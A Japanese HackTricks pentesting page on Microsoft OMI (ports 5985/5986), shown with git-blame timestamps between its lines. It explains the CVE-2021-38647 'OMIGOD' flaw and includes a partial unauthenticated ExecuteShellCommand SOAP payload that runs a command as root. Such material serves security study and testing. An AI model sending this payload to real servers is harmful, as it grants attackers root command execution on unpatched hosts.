2024-02-09 12:54:39 +00:00
# 5985,5986 - OMIのペンテスト
2022-04-28 16:01:33 +00:00
2024-02-09 12:54:39 +00:00
< details >
< summary > < strong > **htARTE( HackTricks AWS Red Team Expert) **で**ゼロからヒーローまでのAWSハッキング**を学びましょう!< / strong > < / summary >
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**してみたいですか?または、**最新バージョンのPEASSにアクセス**したいですか、または**HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見しましょう、当社の独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクション
* [**公式PEASS& HackTricksスワッグ** ](https://peass.creator-spring.com )を手に入れましょう
* **[💬](https://emojipedia.org/speech-balloon/) [Discordグループ ](https://discord.gg/hRep4RUj7f )**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で私をフォローする🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **ハッキングトリックを共有するために、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
2022-02-02 14:36:35 +00:00
2024-02-09 12:54:39 +00:00
< / details >
### **基本情報**
2022-02-02 14:36:35 +00:00
2024-02-09 12:54:39 +00:00
**OMI**は、Microsoftによって開発された**[オープンソース](https://github.com/microsoft/omi)**ツールで、リモート構成管理を目的としています。特に、以下のサービスを利用するAzure上のLinuxサーバーにとって重要です:
2022-02-02 14:36:35 +00:00
2024-02-09 12:54:39 +00:00
- **Azure Automation**
- **Azure Automatic Update**
- **Azure Operations Management Suite**
- **Azure Log Analytics**
- **Azure Configuration Management**
- **Azure Diagnostics**
2022-02-02 14:36:35 +00:00
2024-02-09 12:54:39 +00:00
これらのサービスがアクティブ化されると、プロセス`omiengine`が開始され、すべてのインターフェースでrootとしてリッスンします。
2022-02-02 14:36:35 +00:00
2024-02-09 12:54:39 +00:00
使用される**デフォルトポート**は**5985**( http) および**5986**( https) です。
2022-02-02 14:36:35 +00:00
2024-02-09 12:54:39 +00:00
### **[CVE-2021-38647脆弱性](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647)**
2022-02-02 14:36:35 +00:00
2024-02-09 12:54:39 +00:00
2021年9月16日に観察されたように、Azureに展開されたLinuxサーバーは、言及されたサービスにより脆弱なOMIのバージョンによって影響を受けます。この脆弱性は、認証ヘッダーを必要とせずに`/wsman`エンドポイントを介してメッセージを処理するOMIサーバーの中にあり、クライアントを誤って認証します。
攻撃者は、認証ヘッダーなしで"ExecuteShellCommand" SOAPペイロードを送信することで、サーバーにroot権限でコマンドを実行させることができます。
2022-02-02 14:36:35 +00:00
```xml
< s:Envelope xmlns:s = "http://www.w3.org/2003/05/soap-envelope" xmlns:a = "http://schemas.xmlsoap.org/ws/2004/08/addressing"
2023-07-07 23:42:27 +00:00
...
< s:Body >
< p:ExecuteShellCommand_INPUT xmlns:p = "http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem" >
< p:command > id< / p:command >
< p:timeout > 0< / p:timeout >
< / p:ExecuteShellCommand_INPUT >
< / s:Body >
2022-02-02 14:36:35 +00:00
< / s:Envelope >
```
2024-02-09 12:54:39 +00:00
## 参考
2022-02-02 14:36:35 +00:00
* [https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/ ](https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/ )
* [https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/ ](https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/ )
2022-04-28 16:01:33 +00:00
< details >
2024-02-09 12:54:39 +00:00
< summary > < strong > htARTE( HackTricks AWS Red Team Expert) < / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > を使って、ゼロからヒーローまでAWSハッキングを学ぶ< / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-09 12:54:39 +00:00
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを入手してください
2024-02-07 05:47:12 +00:00
* [**公式PEASS& HackTricks swag** ](https://peass.creator-spring.com )を手に入れましょう
2024-02-09 12:54:39 +00:00
* **[💬](https://emojipedia.org/speech-balloon/) Discordグループ**に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で私をフォローする🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
2024-02-07 05:47:12 +00:00
* **ハッキングトリックを共有するために、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
2022-04-28 16:01:33 +00:00
< / details >